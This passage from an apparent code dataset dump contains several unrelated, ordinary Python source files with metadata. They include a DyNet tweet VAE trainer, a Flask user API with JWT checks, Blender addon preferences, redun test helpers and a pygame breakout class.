W_mu_tweet, V_mu_tweet, b_mu_tweet), DROPOUT)\n log_var_tweet = dy.dropout(mlp(src_output, W_sig_tweet, V_sig_tweet, b_sig_tweet), DROPOUT)\n \n W_mu_tag = dy.parameter(W_mu_tag_p)\n V_mu_tag = dy.parameter(V_mu_tag_p)\n b_mu_tag = dy.parameter(b_mu_tag_p)\n\n W_sig_tag = dy.parameter(W_sig_tag_p)\n V_sig_tag = dy.parameter(V_sig_tag_p)\n b_sig_tag = dy.parameter(b_sig_tag_p)\n \n # Compute tag encoding\n tags_tensor = dy.sparse_inputTensor([tags], np.ones((len(tags),)), (NUM_TAGS,))\n \n mu_tag = dy.dropout(mlp(tags_tensor, W_mu_tag, V_mu_tag, b_mu_tag), DROPOUT)\n log_var_tag = dy.dropout(mlp(tags_tensor, W_sig_tag, V_sig_tag, b_sig_tag), DROPOUT)\n \n # Combine encodings for mean and diagonal covariance\n W_mu = dy.parameter(W_mu_p)\n b_mu = dy.parameter(b_mu_p)\n\n W_sig = dy.parameter(W_sig_p)\n b_sig = dy.parameter(b_sig_p)\n \n # Slowly phase out getting both inputs\n if random.random() < epsilon:\n mask = dy.zeros(HIDDEN_DIM)\n else:\n mask = dy.ones(HIDDEN_DIM)\n \n if random.random() < 0.5:\n mu_tweet = dy.cmult(mu_tweet, mask)\n log_var_tweet = dy.cmult(log_var_tweet, mask)\n else:\n mu_tag = dy.cmult(mu_tag, mask)\n log_var_tag = dy.cmult(log_var_tag, mask)\n \n mu = dy.affine_transform([b_mu, W_mu, dy.concatenate([mu_tweet, mu_tag])])\n log_var = dy.affine_transform([b_sig, W_sig, dy.concatenate([log_var_tweet, log_var_tag])])\n\n # KL-Divergence loss computation\n #kl_loss = -0.5 * dy.sum_elems(1 + log_var - dy.pow(mu, dy.inputVector([2])) - dy.exp(log_var))\n\n z = reparameterize(mu, log_var)\n\n # now step through the output sentence\n all_losses = []\n\n current_state = lstm_decode.initial_state().set_s([z, dy.tanh(z)])\n prev_word = src[0]\n W_sm = dy.parameter(W_tweet_softmax_p)\n b_sm = dy.parameter(b_tweet_softmax_p)\n\n for next_word in src[1:]:\n # feed the current state into the\n \n current_state = current_state.add_input(embed[prev_word])\n output_embedding = current_state.output()\n\n s = dy.affine_transform([b_sm, W_sm, output_embedding])\n \n all_losses.append(dy.pickneglogsoftmax(s, next_word))\n\n # Slowly phase out teacher forcing (this may be slow??)\n if random.random() < epsilon:\n p = dy.softmax(s).npvalue()\n prev_word = np.random.choice(VOCAB_SIZE, p=p/p.sum())\n else:\n prev_word = next_word\n \n softmax_loss = dy.esum(all_losses)\n\n W_hidden = dy.parameter(W_hidden_p)\n b_hidden = dy.parameter(b_hidden_p)\n \n W_out = dy.parameter(W_tag_output_p)\n b_out = dy.parameter(b_tag_output_p)\n \n h = dy.dropout(dy.tanh(b_hidden + W_hidden * z), DROPOUT)\n o = dy.logistic(b_out + W_out * h)\n \n crossentropy_loss = dy.binary_log_loss(o, tags_tensor)\n \n #return kl_loss, softmax_loss, crossentropy_loss\n return softmax_loss, crossentropy_loss\n\n\n\n# Training\n#print(\"Training...\")\nprint ('Using batch size of {}.'.format(BATCH_SIZE))\n\nepsilon = EPSILON_MIN\n#kl_weight = KL_WEIGHT_START\nsteps = 0\nstrikes = 0\nlast_dev_loss = np.inf\nfor ITER in range(100):\n # Perform training\n random.shuffle(train)\n \n batches = [train[i:i + BATCH_SIZE] for i in range(0, len(train), BATCH_SIZE)]\n \n #train_words, train_loss, train_kl_loss, train_reconstruct_loss, total_tag_loss = 0, 0.0, 0.0, 0.0, 0.0\n train_words, train_loss, train_reconstruct_loss, total_tag_loss = 0, 0.0, 0.0, 0.0\n start = time()\n \n print()\n print ('Training ... Iteration:', ITER, 'Epsilon:', epsilon)\n for i, batch in enumerate(tqdm(batches)):\n dy.renew_cg()\n #dy.renew_cg(immediate_compute=True, check_validity=True) # makes program die--is_valid() not implemented for CUDA yet\n #dy.renew_cg(immediate_compute=True)\n losses = []\n for sent_id, sent in enumerate(batch):\n if len(sent[1]) < 1 or len(sent[0]) < 3:\n continue\n #kl_loss, softmax_loss, tag_loss = calc_loss(sent, epsilon)\n softmax_loss, tag_loss = calc_loss(sent, epsilon)\n #total_loss = dy.esum([kl_loss, softmax_loss, tag_loss])\n #train_loss += total_loss.value()\n \n # Gradually increase KL-Divergence loss\n# if steps < 15000:\n# kl_weight = 1 / (1 + np.exp(-0.001 * steps + 5))\n# else:\n# kl_weight = 1.0\n\n # Zero out KL weight\n #kl_weight = 0.0\n #kl_weight = 1e-6\n \n #losses.append(dy.esum([kl_weight * kl_loss, softmax_loss, tag_loss]))\n losses.append(dy.esum([softmax_loss, tag_loss])) # fails with gradient nan error\n\n # Record the KL loss and reconstruction loss separately help you monitor the training.\n #train_kl_loss += kl_loss.value()\n train_reconstruct_loss += softmax_loss.value()\n total_tag_loss += tag_loss.value()\n \n train_words += len(sent[0])\n steps += 1\n \n # Batch update\n batch_loss = dy.esum(losses)/BATCH_SIZE\n train_loss += batch_loss.value()\n batch_loss.backward()\n #batch_loss.backward(full=True)\n pdb.set_trace()\n trainer.update() # fails here with gradient nan or inf error\n \n \n #total_loss.backward()\n #trainer.update()\n #if (sent_id + 1) % 1000 == 0:\n\n # print(\"--finished %r sentences\" % (sent_id + 1))\n\n # Gradually increase KL-Divergence loss\n if steps < 100000:\n epsilon = .9 / (1 + np.exp(-0.0001 * steps + 5))\n else:\n epsilon = EPSILON_MAX\n \n #epsilon = min(EPSILON_MAX, epsilon + 0.05)\n try:\n train_ppl = math.exp(train_loss / train_words)\n except OverflowError as e:\n train_ppl = 1e6\n\n# print(\"iter %r: train loss/word=%.4f, kl loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.4f\" % (\n# ITER, train_loss / train_words, train_kl_loss / train_words, train_reconstruct_loss / train_words,\n# train_ppl, total_tag_loss / len(train)))\n\n print(\"iter %r: train loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.4f\" % (\n ITER, train_loss / train_words, train_reconstruct_loss / train_words,\n train_ppl, total_tag_loss / len(train)))\n\n # Evaluate on dev set\n #dev_words, dev_loss, dev_kl_loss, dev_reconstruct_loss, dev_tag_loss = 0, 0.0, 0.0, 0.0, 0.0\n dev_words, dev_loss, dev_reconstruct_loss, dev_tag_loss = 0, 0.0, 0.0, 0.0\n start = time()\n print ('Evaluating batch ... ')\n for sent_id, sent in enumerate(tqdm(dev)):\n dy.renew_cg()\n if len(sent[1]) < 1 or len(sent[0]) < 3:\n continue\n #kl_loss, softmax_loss, tag_loss = calc_loss(sent)\n softmax_loss, tag_loss = calc_loss(sent)\n\n #dev_kl_loss += kl_loss.value()\n dev_reconstruct_loss += softmax_loss.value()\n dev_tag_loss += tag_loss.value()\n #dev_loss += kl_loss.value() + softmax_loss.value() + tag_loss.value()\n dev_loss += softmax_loss.value() + tag_loss.value() # take out kl_loss\n\n dev_words += len(sent[0])\n trainer.update()\n\n try:\n dev_ppl = math.exp(dev_loss / dev_words)\n except:\n dev_ppl = 1e6\n\n# print(\"iter %r: dev loss/word=%.4f, kl loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.2f\" % (\n# ITER, dev_loss / dev_words, dev_kl_loss / dev_words, dev_reconstruct_loss / dev_words,\n# dev_ppl, dev_tag_loss / len(dev)))\n\n print(\"iter %r: dev loss/word=%.4f, reconstruction loss/word=%.4f, ppl=%.4f, tag loss=%.2f\" % (\n ITER, dev_loss / dev_words, dev_reconstruct_loss / dev_words,\n dev_ppl, dev_tag_loss / len(dev)))\n\n if dev_loss > last_dev_loss and ITER > 9:\n strikes += 1\n else:\n strikes = 0\n last_dev_loss = dev_loss\n model.save('/usr0/home/mamille2/twitter/models/tweet_tag_vae.best.weights')\n \n if strikes >= PATIENCE:\n print ('Early stopping after {} iterations.')\n break\n\n\ntry:\n\toutpath = '/usr0/home/mamille2/twitter/models/trained_project.weights'\n\tprint(\"Saving model weights to {}...\".format(outpath), end=' ')\n\tmodel.save(outpath)\n\tprint(\"done.\")\nexcept:\n\tpdb.set_trace()\n","sub_path":"train_model_nokl.py","file_name":"train_model_nokl.py","file_ext":"py","file_size_in_byte":17110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"317387531","text":"from utils.color import color\n\n\nclass Solver:\n def solve(self):\n amber = (255, 192, 0)\n\n if self.solve_method is not None:\n try:\n result = self.solve_method()\n except Exception as e:\n raise Exception(color(f\"WARNING : {e}\", amber))\n else:\n print(result)\n else:\n raise Exception(color(\"WARNING : solve() is undefined\", amber))\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"382982622","text":"#!/usr/bin/env python3\r\n#-*- coding:utf-8 -*-\r\n\r\n'the script of create Mysql-table'\r\n\r\n__author__='jcm'\r\n\r\nimport sys\r\nfrom class_of_Mysql import Mysql\r\nfrom class_of_Xls import Xls\r\nfrom func_of_auto_insert import Auto_insert\r\nfrom func_of_create_tuple import create_tuple\r\n\r\n#建立连接数据库\r\ncase_Mysql=Mysql('qs','192.168.62.249','3306')\r\ncase_Mysql.connect('fangyuan')\r\n\r\n#建立Xls文件\r\ncase_Xls=Xls(input('请输入Xls文件路径:'),input('请输入读取sheet名:'))\r\ncase_table=case_Xls.openXls()\r\ncase_Mysql_table=input('请输入插入数据的表名:')\r\n\r\nfor row_number in case_Xls.no_insert:\r\n row_list=case_table.row_values(row_number)\r\n Auto_insert(\r\n #数据库对象\r\n case_Mysql,\r\n #数据库\r\n case_Mysql_table,\r\n #插入字段\r\n case_Xls.fields_tuple,\r\n #pid\r\n row_list[0],\r\n #楼盘\r\n row_list[1],\r\n #期\r\n create_tuple(row_list[2]),\r\n #栋\r\n create_tuple(row_list[3]),\r\n #座\r\n create_tuple(row_list[4]),\r\n #单元\r\n create_tuple(row_list[5]),\r\n #房号\r\n create_tuple(row_list[6]))\r\n \r\n#断开数据库\r\ncase_Mysql.disconnect()\r\n","sub_path":"DataManager/functions/data_process/script_of_create_Mysql-table.py","file_name":"script_of_create_Mysql-table.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"381864747","text":"import bpy\nimport platform\nfrom extensions_framework import util as efutil\nfrom bpy.types import AddonPreferences\nfrom bpy.props import StringProperty\nfrom . import common\n\nclass SORTAddonPreferences(AddonPreferences):\n bl_idname = common.preference_bl_name\n # this must match the addon name\n install_path = StringProperty(\n name=\"Path to SORT binary\",\n description='Path to SORT binary',\n subtype='DIR_PATH',\n default='',\n )\n\n install_path_debug = StringProperty(\n name='Path to SORT binary(debug)',\n description='Path to SORT binary(debug)',\n subtype='DIR_PATH',\n default='',\n )\n\n pbrt_export_path = StringProperty(\n name='Pbrt exporting path',\n description='Path to exported pbrt scene',\n subtype='DIR_PATH',\n default='',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"install_path\")\n layout.prop(self, \"install_path_debug\")\n layout.prop(self, \"pbrt_export_path\")\n\ndef get_sort_dir(force_debug=False):\n addon_prefs = bpy.context.user_preferences.addons[common.preference_bl_name].preferences\n debug = bpy.context.scene.debug_prop\n return_path = addon_prefs.install_path\n if debug is True:\n return_path = addon_prefs.install_path_debug\n if force_debug:\n return_path = addon_prefs.install_path_debug\n return efutil.filesystem_path(return_path) + \"/\"\n\ndef get_sort_bin_path(force_debug=False):\n sort_bin_dir = get_sort_dir(force_debug)\n if platform.system() == 'Darwin': # for Mac OS\n sort_bin_path = sort_bin_dir + \"sort\"\n elif platform.system() == 'Windows': # for Windows\n sort_bin_path = sort_bin_dir + \"sort.exe\"\n elif platform.system() == \"Linux\":\n sort_bin_path = sort_bin_dir + \"SORT\"\n else:\n raise Exception(\"SORT is only supported on Windows, Ubuntu and Mac OS\")\n return sort_bin_path\n\ndef get_immediate_dir(force_debug=False):\n sort_bin_dir = get_sort_dir(force_debug)\n immediate_dir = sort_bin_dir + 'blender_intermediate/'\n return immediate_dir\n\ndef get_immediate_res_dir(force_debug=False):\n return get_immediate_dir(force_debug) + 'res/'\n\ndef register():\n bpy.utils.register_class(SORTAddonPreferences)\n\ndef unregister():\n bpy.utils.unregister_class(SORTAddonPreferences)\n","sub_path":"sortblend/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"397378344","text":"from flask_restful import Resource\nfrom flask_restful import abort\nfrom flask_restful import marshal_with, marshal\nfrom flask_restful import fields\nfrom flask_restful import reqparse\nfrom app.db import dbs\nfrom app.models.user import User\nimport re\nfrom datetime import datetime\nfrom app.resources.auth import validate_protected_action_permission_jwt, validate_login_jwt, get_login_jwt\n\nuser_fields = {\n 'id': fields.Integer,\n 'firstname': fields.String,\n 'lastname': fields.String,\n 'nickname': fields.String,\n 'birthday': fields.DateTime,\n 'size': fields.Float,\n 'sex': fields.String,\n 'email': fields.String,\n 'administrator': fields.Boolean,\n 'moderator': fields.Boolean,\n 'uri': fields.Url('area', absolute=True),\n 'time_created': fields.DateTime,\n 'time_updated': fields.DateTime\n}\n\nparser = reqparse.RequestParser()\nparser.add_argument('firstname')\nparser.add_argument('lastname')\nparser.add_argument('nickname')\nparser.add_argument('birthday')\nparser.add_argument('password')\nparser.add_argument('size', type=float)\nparser.add_argument('sex')\nparser.add_argument('email', required=True, help=\"Email cannot be blank!\")\nparser.add_argument('installAdmin', type=bool)\n\npromotion_parser = reqparse.RequestParser()\npromotion_parser.add_argument('promoteToAdmin', type=bool)\npromotion_parser.add_argument('promoteToMod', type=bool)\n\nsexes = [None, 'male', 'female']\n\n\nclass UserResource(Resource):\n @marshal_with(user_fields, envelope='data')\n def get(self, id):\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 001) User {} doesn't exist\".format(id))\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n return user\n\n @validate_protected_action_permission_jwt\n def delete(self, id, **kwargs):\n if kwargs['protected_action_permission'] != 'delete':\n abort(401, message='(Code 025) Wrong permissions!')\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 002) User {} doesn't exist\".format(id))\n dbs.delete(user)\n dbs.commit()\n return {}, 204\n\n @validate_protected_action_permission_jwt\n @validate_login_jwt\n def put(self, id, **kwargs):\n parsed_args = parser.parse_args()\n\n if not (parsed_args['nickname'] or (parsed_args['firstname'] and parsed_args['lastname'])):\n abort(400, message=\"(Code 003) Either a nickname or a firstname and lastname need to be given!\")\n\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", parsed_args['email']):\n abort(400, message=\"(Code 004) Email field is invalid!\")\n\n if not parsed_args['sex'] in sexes:\n abort(400, message=\"(Code 027) Invalid sex!\")\n\n user = dbs.query(User).filter(User.id == id).first()\n\n if not user:\n abort(404, message=\"(Code 080) User {} doesn't exist\".format(id))\n\n if kwargs['user'].email != user.email:\n abort(401, message=\"(Code 005) Unauthorized!\")\n\n user.firstname = parsed_args['firstname']\n user.lastname = parsed_args['lastname']\n user.nickname = parsed_args['nickname']\n user.size = parsed_args['size']\n user.sex = parsed_args['sex']\n user.birthday = datetime.strptime(parsed_args['birthday'], '%Y-%m-%d') if parsed_args[\n 'birthday'] else None\n if user.email != parsed_args['email']: # Changing the email address needs special permissions\n if kwargs['protected_action_permission'] != 'put':\n abort(401, message='(Code 006) Unauthorized!')\n else:\n user.email = parsed_args['email']\n generate_refreshed_jwt = True\n else:\n generate_refreshed_jwt = False\n if parsed_args['password']: # So does changing the password\n if kwargs['protected_action_permission'] != 'put':\n abort(401, message='(Code 007) Unauthorized!')\n else:\n user.password = parsed_args['password']\n dbs.add(user)\n dbs.commit()\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n marshalled_response = marshal(user, user_fields, envelope='data')\n # When email changed, the login JWT is now invalid and a new one has to be sent\n if generate_refreshed_jwt:\n marshalled_response['refreshedJWT'] = get_login_jwt(user.email)\n return marshalled_response, 201\n\n\nclass UserListResource(Resource):\n @marshal_with(user_fields, envelope='data')\n def get(self):\n users = dbs.query(User).all()\n for user in users:\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time())\n return users\n\n @marshal_with(user_fields, envelope='data')\n def post(self):\n parsed_args = parser.parse_args()\n\n # If there is not admin in the system yet, an admin can be created this way. This will only work for the first\n # admin in the system!\n is_admin = False\n if parsed_args['installAdmin']:\n if not dbs.query(User).filter(User.administrator).all():\n is_admin = True\n else:\n abort(401, message=\"(Code 036) Falsely attempted to create initial administrator!\")\n\n if not (parsed_args['nickname'] or (parsed_args['firstname'] and parsed_args['lastname'])):\n abort(400, message=\"(Code 008) Either a nickname or a firstname and lastname need to be given!\")\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", parsed_args['email']):\n abort(400, message=\"(Code 009) Email field is invalid!\")\n if not parsed_args['password']:\n abort(400, message=\"(Code 010) Password cannot be blank!\")\n if not parsed_args['sex'] in sexes:\n abort(400, message=\"(Code 026) Invalid sex!\")\n\n birthday = datetime.strptime(parsed_args['birthday'], '%Y-%m-%d') if parsed_args[\n 'birthday'] else None\n user = User(firstname=parsed_args['firstname'],\n lastname=parsed_args['lastname'],\n nickname=parsed_args['nickname'],\n birthday=birthday,\n size=parsed_args['size'],\n sex=parsed_args['sex'],\n email=parsed_args['email'],\n password=parsed_args['password'],\n administrator=is_admin,\n moderator=is_admin)\n dbs.add(user)\n dbs.commit()\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n return user, 201\n\n\nclass PromotionResource(Resource):\n @marshal_with(user_fields, envelope='data')\n @validate_login_jwt\n def put(self, id, **kwargs):\n parsed_args = promotion_parser.parse_args()\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 037) User {} doesn't exist\".format(id))\n if parsed_args['promoteToAdmin']:\n if user.administrator:\n abort(404, message=\"(Code 040) User is already an administrator!\")\n else:\n if kwargs['user'].administrator:\n user.administrator = True\n user.moderator = True\n else:\n abort(401, message=\"(Code 038) Unauthorized!\")\n if parsed_args['promoteToMod']:\n if user.administrator:\n abort(404, message=\"(Code 041) User is already an administrator!\")\n elif user.moderator:\n abort(404, message=\"(Code 042) User is already a moderator!\")\n else:\n if kwargs['user'].moderator or kwargs['user'].administrator:\n user.moderator = True\n else:\n abort(401, message=\"(Code 039) Unauthorized!\")\n dbs.add(user)\n dbs.commit()\n return user, 201\n","sub_path":"server/app/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"306937588","text":"from logging import StreamHandler, DEBUG, Formatter, FileHandler, getLogger\nlogger = getLogger(__name__)\n\nDIR = 'result_tmp/'\n\nlog_fmt = Formatter('%(asctime)s %(name)s %(lineno)d [%(levelname)s][%(funcName)s] %(message)s ')\nhandler = StreamHandler()\nhandler.setLevel('INFO')\nhandler.setFormatter(log_fmt)\nlogger.addHandler(handler)\n\nhandler = FileHandler(DIR + 'test.log', 'a')\nhandler.setLevel(DEBUG)\nhandler.setFormatter(log_fmt)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"443569067","text":"__copyright__ = \"Copyright (c) 2020 Jina AI Limited. All rights reserved.\"\n__license__ = \"Apache-2.0\"\n\nfrom typing import Optional\n\nfrom . import FlatRecursiveMixin, BaseExecutableDriver, DocsExtractUpdateMixin\n\n\nclass CraftDriver(DocsExtractUpdateMixin, FlatRecursiveMixin, BaseExecutableDriver):\n \"\"\"Drivers inherited from this Driver will bind :meth:`craft` by default \"\"\"\n\n def __init__(\n self, executor: Optional[str] = None, method: str = 'craft', *args, **kwargs\n ):\n super().__init__(executor, method, *args, **kwargs)\n\n @property\n def _stack_document_content(self):\n return False\n","sub_path":"jina/drivers/craft.py","file_name":"craft.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474244059","text":"# coding: utf-8\nfrom unittest import TestCase as UnitTestCase\nfrom .models import Food\nfrom mytaggit.models import Tag\n\n\nclass FoodTestCase(UnitTestCase):\n\n def test_slug(self):\n food = Food.objects.create()\n food.tags.add('沖縄')\n self.assertEqual(1, Tag.objects.count())\n tag = food.tags.first()\n self.assertEqual(tag.slug, 'okinawa')\n\n def test_unique_slug(self):\n food = Food.objects.create()\n food.tags.add(\n '無常', '無情',\n )\n tags = list(food.tags.all())\n self.assertTrue(tags[1].slug.startswith(tags[0].slug))\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"130489381","text":"import importlib\nimport os\nimport pkgutil\nimport re\nimport shutil\nimport tempfile\nimport time\nfrom contextlib import contextmanager\nfrom functools import wraps\nfrom inspect import getmembers, getmodule, isclass, isfunction, ismethod, ismodule\nfrom itertools import zip_longest\nfrom typing import Any, Callable, Dict, Iterator, List, NamedTuple, Optional, Type\n\nimport sqlalchemy.event\n\nfrom redun import Scheduler\n\n\ndef clean_dir(path: str) -> None:\n \"\"\"\n Ensure path exists and is an empty directory.\n \"\"\"\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n\n\ndef get_test_file(filename: str) -> str:\n \"\"\"\n Returns a file from test_data.\n \"\"\"\n basedir = os.path.dirname(__file__)\n return os.path.join(basedir, filename)\n\n\ndef use_tempdir(func: Callable) -> Callable:\n \"\"\"\n Run function within a temporary directory.\n \"\"\"\n\n @wraps(func)\n def wrap(*args: Any, **kwargs: Any) -> Any:\n with tempfile.TemporaryDirectory() as tmpdir:\n original_dir = os.getcwd()\n os.chdir(tmpdir)\n\n try:\n result = func(*args, **kwargs)\n finally:\n os.chdir(original_dir)\n return result\n\n return wrap\n\n\ndef assert_match_lines(patterns: List[str], lines: List[str]) -> None:\n \"\"\"\n Asserts whether `lines` match `patterns`.\n \"\"\"\n assert len(patterns) == len(lines)\n for pattern, line in zip(patterns, lines):\n assert re.fullmatch(pattern, line)\n\n\ndef assert_match_text(pattern: str, text: str, wildcard: str = \"*\"):\n \"\"\"\n Assert whether two strings are equal using wildcards.\n \"\"\"\n for i, (a, b) in enumerate(zip_longest(pattern, text)):\n if a != b and a != wildcard:\n assert False, \"mismatch on character {}: '{}' != '{}'\".format(\n i, pattern[: i + 1], text[: i + 1]\n )\n\n\ndef wait_until(cond: Callable[[], bool], interval: float = 0.02, timeout: float = 1.0) -> None:\n \"\"\"\n Wait until `cond()` is True or timeout is exceeded.\n \"\"\"\n start = time.time()\n while not cond():\n if time.time() - start > timeout:\n raise RuntimeError(\"Timeout\")\n time.sleep(interval)\n\n\nclass MatchEnv:\n \"\"\"\n\n An environment for generating Match objects.\n \"\"\"\n\n def __init__(self):\n self.vars: Dict[str, Any] = {}\n\n def match(self, *args, **kwargs) -> \"Match\":\n kwargs[\"env\"] = self\n return Match(*args, **kwargs)\n\n\nclass Match:\n \"\"\"\n Helper for asserting values have particular properties (types, etc).\n \"\"\"\n\n def __init__(\n self,\n type: Optional[Type] = None,\n var: Optional[str] = None,\n regex: Optional[str] = None,\n any: bool = True,\n env: Optional[MatchEnv] = None,\n ):\n self.any = any\n self.type = type\n self.var = var\n self.regex = regex\n self.env = env\n\n def __repr__(self) -> str:\n if self.var:\n return \"Match(var={})\".format(self.var)\n elif self.type:\n return \"Match(type={})\".format(self.type.__name__)\n elif self.regex:\n return \"Match(regex={})\".format(self.regex)\n elif self.any:\n return \"Match(any=True)\"\n else:\n return \"Match()\"\n\n def __eq__(self, other: Any) -> bool:\n if self.env and self.var:\n # First instance of var will always return True.\n # Second instance of var has to match previous value.\n expected = self.env.vars.setdefault(self.var, other)\n if expected != other:\n return False\n\n if self.type:\n return isinstance(other, self.type)\n\n elif self.regex:\n return bool(re.fullmatch(self.regex, other))\n\n else:\n return self.any\n\n\nclass QueryStats(NamedTuple):\n \"\"\"\n Stats for a recorded SQLAlchemy query.\n \"\"\"\n\n statement: str\n parameters: tuple\n duration: float\n\n\n@contextmanager\ndef listen_queries(engine: Any) -> Iterator[List[QueryStats]]:\n \"\"\"\n Context for capturing SQLAlchemy queries.\n\n .. code-block:: python\n\n with listen_queries(engine) as queries:\n result = session.query(Model).filter(...)\n # More SQLAlchemy queries...\n\n # queries now has a list of statement and parameter tuples.\n assert len(queries) == 2\n \"\"\"\n queries = []\n cursors = {}\n\n def before(conn, cursor, statement, parameters, context, executemany):\n cursors[cursor] = time.time()\n\n def after(conn, cursor, statement, parameters, context, executemany):\n duration = time.time() - cursors.pop(cursor)\n queries.append(QueryStats(statement, parameters, duration))\n\n sqlalchemy.event.listen(engine, \"before_cursor_execute\", before)\n sqlalchemy.event.listen(engine, \"after_cursor_execute\", after)\n\n yield queries\n\n sqlalchemy.event.remove(engine, \"before_cursor_execute\", before)\n sqlalchemy.event.remove(engine, \"after_cursor_execute\", after)\n\n\ndef import_all_modules(pkg):\n \"\"\"Import (almost) all modules within a package.\n\n Ignores explicitly marked modules.\n \"\"\"\n ignored_modules = (\"redun.backends.db.alembic.env\",) # https://stackoverflow.com/a/52575218\n modules = []\n for _, module_name, is_pkg in pkgutil.iter_modules(pkg.__path__):\n full_name = f\"{pkg.__name__}.{module_name}\"\n if full_name in ignored_modules:\n continue\n\n module = importlib.import_module(full_name)\n if is_pkg:\n modules.extend(import_all_modules(module))\n else:\n modules.append(module)\n\n return modules\n\n\ndef get_docstring_owners_in_module(module):\n \"\"\"Get all functions, classes and their methods defined within a python module.\n\n Returns\n -------\n docstring_owners : set\n Set of functions, classes and methods\n \"\"\"\n assert ismodule(module), f\"Passed {module.__name__} which is not a module.\"\n\n def is_valid(obj):\n if getmodule(obj) == module:\n if ismethod(obj) or isfunction(obj):\n return not obj.__name__.startswith(\"_\")\n if isclass(obj):\n return True\n return False\n\n to_check = {obj for _, obj in getmembers(module) if is_valid(obj)}\n docstring_owners = set()\n seen = set()\n\n while to_check:\n candidate = to_check.pop()\n if candidate in seen:\n continue\n\n if isfunction(candidate) or ismethod(candidate):\n docstring_owners.add(candidate)\n\n if isclass(candidate):\n to_check.update({obj for _, obj in getmembers(candidate) if is_valid(obj)})\n\n seen.add(candidate)\n return docstring_owners\n\n\ndef docstring_owner_pretty_name(docstring_owner):\n return \".\".join((docstring_owner.__module__, docstring_owner.__qualname__))\n\n\ndef mock_scheduler():\n \"\"\"\n Returns a scheduler with mocks for job completion.\n \"\"\"\n # Setup scheduler callbacks.\n scheduler = Scheduler()\n\n scheduler.job_results = {}\n scheduler.job_errors = {}\n\n def done_job(job, result, job_tags=[]):\n job.job_tags.extend(job_tags)\n scheduler.job_results[job.id] = result\n\n def reject_job(job, error, error_traceback=None, job_tags=[]):\n if job:\n job.job_tags.extend(job_tags)\n scheduler.job_errors[job.id] = error\n else:\n # Scheduler error, reraise it.\n raise error\n\n def batch_wait(job_ids):\n while not all(\n job_id in scheduler.job_results or job_id in scheduler.job_errors for job_id in job_ids\n ):\n time.sleep(0.1)\n\n scheduler.done_job = done_job\n scheduler.reject_job = reject_job\n scheduler.batch_wait = batch_wait\n\n return scheduler\n","sub_path":"redun/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"530216274","text":"import pygame\nfrom breakout.model.Bullet import Bullet\nfrom breakout.control.constants import COLOR_BLACK, COLOR_BALL\n\n\nclass Gun(pygame.sprite.Sprite):\n\n def __init__(self, color, width, height):\n super().__init__()\n self.image = pygame.Surface([width, height])\n self.image.fill(COLOR_BLACK)\n self.image.set_colorkey(COLOR_BLACK)\n self.rect = self.image.get_rect()\n pygame.draw.polygon(self.image, color, [self.rect.midtop, self.rect.bottomleft, self.rect.bottomright])\n\n self.fire_rate = 0\n self.MAX_FIRE_RATE = 80\n\n def fire(self, bullets):\n self.fire_rate += 1\n\n if self.fire_rate > self.MAX_FIRE_RATE:\n bullet = Bullet(COLOR_BALL, 7, 7)\n bullet.rect.centerx = self.rect.centerx\n bullet.rect.bottom = self.rect.top\n bullets.add(bullet)\n\n self.fire_rate = 0\n","sub_path":"breakout/model/Gun.py","file_name":"Gun.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"16774904","text":"from core.advbase import *\n\nclass Kimono_Luca(Adv):\n comment = 'mochi master not implemented'\n @allow_acl\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = 'all'\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\nvariants = {None: Kimono_Luca}\n","sub_path":"adv/kimono_luca.py","file_name":"kimono_luca.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"49904644","text":"def setup():\n default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')\n env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)\n if env:\n pyrax.set_environment(env)\n keyring_username = 